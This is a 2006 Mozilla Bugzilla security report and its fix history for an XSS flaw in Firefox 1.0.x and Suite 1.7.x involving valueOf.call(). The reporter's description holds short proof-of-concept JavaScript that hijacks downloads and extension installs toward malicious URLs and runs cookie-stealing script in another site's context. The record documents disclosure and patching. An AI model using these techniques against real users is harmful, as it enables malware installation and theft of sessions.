Last Comment Bug 327194 - XSS by using .valueOf.call() or .valueOf.apply()
: XSS by using .valueOf.call() or .valueOf.apply()
Status: RESOLVED FIXED
[sg:high]
: fixed1.7.13
Product: Core
Classification: Components
Component: Security (show other bugs)
: 1.7 Branch
: x86 Windows XP
: -- normal (vote)
: ---
Assigned To: Daniel Veditz [:dveditz]
:
: David Keeler [:keeler] (use needinfo?)
Mentors:
Depends on: 290488
Blocks:
  Show dependency treegraph
 
Reported: 2006-02-14 13:48 PST by moz_bug_r_a4
Modified: 2007-04-01 15:36 PDT (History)
6 users (show)
dveditz: blocking1.7.13+
dveditz: blocking‑aviary1.0.8+
bob: in‑testsuite?
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
testcase 1 - hijacks software download process on Apple QuickTime download page (625 bytes, text/html)
2006-02-14 13:51 PST, moz_bug_r_a4
no flags Details
extension to be installed (1.68 KB, application/x-xpinstall)
2006-02-14 13:53 PST, moz_bug_r_a4
no flags Details
testcase 2 - hijacks extension install process on https://addons.mozilla.org/ (910 bytes, text/html)
2006-02-14 13:56 PST, moz_bug_r_a4
no flags Details
exploitable page (138 bytes, text/html)
2006-02-14 13:57 PST, moz_bug_r_a4
no flags Details
testcase 3 - runs script in the context of other site (578 bytes, text/html)
2006-02-14 14:00 PST, moz_bug_r_a4
no flags Details
testcase 4 - shows return values of obj.valueOf.call() and obj.valueOf.apply() (1.10 KB, text/html)
2006-02-18 00:36 PST, moz_bug_r_a4
no flags Details

Description moz_bug_r_a4 2006-02-14 13:48:44 PST
fx 1.0.x and suite 1.7.x are affected.  fx 1.5 and trunk are not affected.

On fx 1.0.x and suite 1.7.x, when calling obj.valueOf.call() or
obj.valueOf.apply() without argument, return value is valueOf's __parent__ that
is Object.prototype.  On fx 1.5 and trunk, return value is global object since
Bug 290488 was fixed.

There are ways to access other site's object (e.g. otherWin.focus, 
otherWin.history), thus an attacker can access other site's Object.prototype
(e.g. otherWin.focus.valueOf.call()).

For example:

An attacker could hijack software download process on a trusted site.

  Exploitable page:
  <script>
  function download() {
	...
  }
  </script>
  <a href="#" onclick="return download()">Download Now</a>

  Attacker:
  w = open(Exploitable page);
  o = w.focus.valueOf.call();
  o.download = function() { w.location = MALICIOUS_EXE_URL; return false; };


An attacker could hijack extension install process on https://addons.mozilla.org/.

  https://addons.mozilla.org/:
  <a href="..." onclick="return install(event,'Extension Name', '../images/default.png');">Install Now</a>

  Attacker:
  w = open(Exploitable page);
  o = w.focus.valueOf.call();
  o.install = function install( aEvent, extName, iconURL)  {   
	var params = new Array();
	params[extName] = {
		URL: MALICIOUS_EXTENSION_URL,
		IconURL: iconURL,
		toString: function () { return this.URL; }
	};
	InstallTrigger.install(params);
	return false;
  };


An attacker could run script in the context of other site.

  Exploitable page:
  <a href="javascript:void(0)" onclick="alert(location)">aaa</a>

  Attacker:
  w = open(Exploitable page);
  o = w.focus.valueOf.call();
  o.alert = o.eval;
  o.location = MALICIOUS_CODE; // e.g. steal cookie
Comment 1 moz_bug_r_a4 2006-02-14 13:51:02 PST
Created attachment 211898 [details]
testcase 1 - hijacks software download process on Apple QuickTime download page
Comment 2 moz_bug_r_a4 2006-02-14 13:53:22 PST
Created attachment 211899 [details]
extension to be installed
Comment 3 moz_bug_r_a4 2006-02-14 13:56:30 PST
Created attachment 211900 [details]
testcase 2 - hijacks extension install process on https://addons.mozilla.org/
Comment 4 moz_bug_r_a4 2006-02-14 13:57:40 PST
Created attachment 211901 [details]
exploitable page
Comment 5 moz_bug_r_a4 2006-02-14 14:00:53 PST
Created attachment 211903 [details]
testcase 3 - runs script in the context of other site

Load this testcase from https://recluse.mozilla.org/show_bug.cgi?id=327194#c4
Comment 6 Daniel Veditz [:dveditz] 2006-02-14 17:38:44 PST
I can confirm this on 1.0.7, but it is fixed in 1.0.8 nightlies. Most likely by the "split-window alternative" fix bug 316589
Comment 7 moz_bug_r_a4 2006-02-14 19:46:56 PST
I can confirm this on:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060214 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060214

I think "split-window alternative" does not fix this.
Comment 8 Daniel Veditz [:dveditz] 2006-02-16 14:24:23 PST
Don't know what mrbkap and I were testing Tuesday, but with a 20060216 Firefox 1.0.8 build I can reproduce all these testcases. Clearing "fixed" keywords.
Comment 9 Daniel Veditz [:dveditz] 2006-02-16 15:24:36 PST
I can also reproduce in 2/7 (right after bug 316589 landed), 2/11 and 2/13

I have no clue why my 2/14 debug build was immune, if I didn't have witnesses I would think I was imagining it.
Comment 10 Daniel Veditz [:dveditz] 2006-02-16 15:31:31 PST
The patch from bug 290488 fixes this.
Comment 11 Daniel Veditz [:dveditz] 2006-02-16 15:47:15 PST
patch from bug 290488 checked into aviary101/moz17 branches
Comment 12 Marcia Knous [:marcia - use ni] 2006-02-17 15:32:04 PST
Using Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060217 Firefox/1.0.8, I can confirm that Testcase 1 and Testcase 2 are fixed.  When I try to run Testcase 3 the browser gets in a weird state and i get a not found error. If is good enough to verify with just the two testcases, then I will add the keyword.

Using Mozilla 1.7.13 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060217, Testcase 1 is okay. Unable to run Testcase 2. Testcase 3 behaves the same way as it does in 1.0.8.
Comment 13 moz_bug_r_a4 2006-02-18 00:32:49 PST
(In reply to comment #12)
> When I try to run Testcase 3 the browser gets in a weird state and i get a
> not found error. If is good enough to verify with just the two testcases,
> then I will add the keyword.

The fix makes w.focus.valueOf.call() return w instead of Object.prototype in w.
Thus, testcase 3 ends up loading the following url, when evaluating
|o.location = code;|.

https://recluse.mozilla.org/window.alert('cookie:%20'%20+%20document.cookie);

This is why you got a not found error.
Comment 14 moz_bug_r_a4 2006-02-18 00:36:07 PST
Created attachment 212299 [details]
testcase 4 - shows return values of obj.valueOf.call() and obj.valueOf.apply()

If return values are *not* Object.prototype, all exploits in this bug never work.
Comment 15 Jay Patel [:jay] 2006-02-20 16:53:01 PST
v.fixed on 1.0.1 Aviary branch with Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060220 Firefox/1.0.8, all testcases seem to pass.
Comment 16 Marcia Knous [:marcia - use ni] 2006-02-21 15:59:11 PST
Just to clarify on the Mozilla suite side, Testcase 2 does pass for the suite. In my earlier testing I noted that the test case did not pass.

(In reply to comment #12)
> Using Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060217
> Firefox/1.0.8, I can confirm that Testcase 1 and Testcase 2 are fixed.  When I
> try to run Testcase 3 the browser gets in a weird state and i get a not found
> error. If is good enough to verify with just the two testcases, then I will add
> the keyword.
> 
> Using Mozilla 1.7.13 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13)
> Gecko/20060217, Testcase 1 is okay. Unable to run Testcase 2. Testcase 3
> behaves the same way as it does in 1.0.8.
> 


Note You need to log in before you can comment on or make changes to this bug.